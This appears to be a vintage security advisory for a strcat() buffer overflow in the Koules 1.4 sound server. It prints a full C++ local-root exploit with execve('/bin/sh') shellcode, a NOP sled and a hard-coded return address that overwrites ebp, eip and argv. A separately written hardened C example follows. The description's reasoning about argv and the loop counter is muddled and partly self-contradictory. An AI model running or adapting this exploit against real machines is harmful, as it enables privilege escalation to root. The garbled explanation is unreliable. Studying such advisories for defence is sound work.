Vulnerability: Koules
Affected: Koules 1.4

Description

Guido Bakker found the following. The problem is in the Koules 1.4 package, source file koules.sndsrv.linux.c, function init(). The loop counter `int i` disappears into a register under gcc's optimization. Since the strcat() call concatenates an array of filenames into a fixed buffer, a long argument overruns it and `argv` gets ruined. This causes the first run of the loop to fail. If argv points somewhere into addressable memory space, the chances of a second pointer being there are close to zero, so the second loop iteration will fail. Last of all, if argv[1] does point to a valid address, the string contained there shouldn't be long enough to overwrite eip a second time, since that gets us into trouble. That's about it. Even then, this ONLY works on machines that have SVGALIB support compiled in and NOT on the X Window version of 'koules'.

/*
 * Coolz.cpp - yep a C Plus Plus exploit, I like that Strings STL :)
 *
 * Love goes out to: Hester and Maja
 * Shouts go out to: Aad de Bruin, Karel Roos, L.G. Weert, Louis Maatman,
 *                   Richard Vriesde.
 *
 * -- We always did feel the same, we just saw it from a different point
 *    of view... [Bob Dylan - Tangled up in Blue] --
 *
 * Scrippie/ronald@grafix.nl
 * Synnergy.net (c) 2000
 */

#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <string>
#include <unistd.h>

using namespace std;

#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"
#define NOP      'A'
#define NUMNOPS  500
/* Since we return in the cleared environment, we don't need to have a
   return address we can influence by command line "offset" arguments */
#define RETADDY  "\x90\xfe\xff\xbf"

string heavenlycode =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char *addytostr(unsigned char *);

int main()
{
    string payload, vector;
    unsigned int i;
    const char *env[3];
    const char *ptr_to_bffffffc;

    /* Construction of our payload */
    payload.append(NUMNOPS, NOP);
    payload.append(heavenlycode);
    env[0] = payload.c_str();
    /* This memory address always contains 0x00000000 */
    env[1] = "\xfc\xff\xff\xbf";
    env[2] = NULL;

    /* Calculate for yourself, and check out: linux/fs/exec.c */
    ptr_to_bffffffc = addytostr((unsigned char *)(0xc0000000 - sizeof(void *)
                                                  - sizeof(FILENAME)
                                                  - sizeof(heavenlycode)
                                                  - sizeof(char *) - 1));

    for (i = 0; i < 256; i++) {
        vector.append(RETADDY);         /* Fill the buffer */
    }
    /* We do NOT overwrite 'int i' - a register is used after gcc -O */
    vector.append(RETADDY);             /* Overwrites ebp */
    vector.append(RETADDY);             /* Overwrites eip */
    vector.append(ptr_to_bffffffc);     /* Overwrites argv argument */

    execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(),
           "A", (char *)NULL, env);
    perror("execle()");
    return EXIT_FAILURE;
}

/* Turns a pointer value into a NUL-terminated string of its raw bytes */
char *addytostr(unsigned char *blaat)
{
    char *ret;

    if (!(ret = (char *)malloc(sizeof(unsigned char *) + 1))) {
        perror("malloc()");
        exit(EXIT_FAILURE);
    }
    memcpy(ret, &blaat, sizeof(unsigned char *));
    ret[sizeof(unsigned char *)] = 0x00;
    return ret;
}

Solution

The FreeBSD xkoules port doesn't install anything setuid or setgid, and is therefore not vulnerable.
Debian does not ship koules or parts of it setuid root and thus is not vulnerable to this exploit.
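The unchecked strcat() pattern the description blames, shown next to a bounded replacement. This is an added example and a hypothetical reconstruction of the bug class, not koules' source or the advisory's code: join_names_checked() refuses any argument set that would not fit the fixed buffer instead of running over the saved ebp, the return address and the argv argument.

```c
#include <string.h>

/* Hypothetical reconstruction, not koules' source: init() strcat()s the
 * filenames from argv into a fixed-size stack buffer with no length
 * check, so one long argument runs past the buffer into the saved ebp,
 * the return address and the argv argument on the stack. */
#define NAMEBUF 256

/* Hardened join: concatenates argv[1..argc-1] into dst (capacity cap).
 * Returns 0 on success, -1 (with dst emptied) if the result would not
 * fit; it refuses rather than silently truncating a filename. */
int join_names_checked(char *dst, size_t cap, int argc, char **argv)
{
    size_t used = 0;

    if (cap == 0)
        return -1;
    dst[0] = '\0';
    for (int i = 1; i < argc; i++) {
        size_t len = strlen(argv[i]);
        if (len > cap - 1 - used) {      /* no room for len bytes + NUL */
            dst[0] = '\0';
            return -1;
        }
        memcpy(dst + used, argv[i], len);
        used += len;
        dst[used] = '\0';
    }
    return 0;
}

/* Self-checks with constructed arguments: a normal directory/filename
 * pair is accepted; an argument longer than the buffer is rejected. */
int demo_normal_args(void)
{
    char buf[NAMEBUF];
    char *args[] = { "koules.sndsrv.linux", "/usr/local/lib/koules/", "sound.raw" };
    return join_names_checked(buf, sizeof buf, 3, args) == 0
        && strcmp(buf, "/usr/local/lib/koules/sound.raw") == 0;
}

int demo_oversized_arg(void)
{
    char buf[NAMEBUF];
    char big[NAMEBUF * 2];               /* constructed: 511 x 'A' */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    char *args[] = { "koules.sndsrv.linux", big };
    return join_names_checked(buf, sizeof buf, 2, args) == -1 && buf[0] == '\0';
}
```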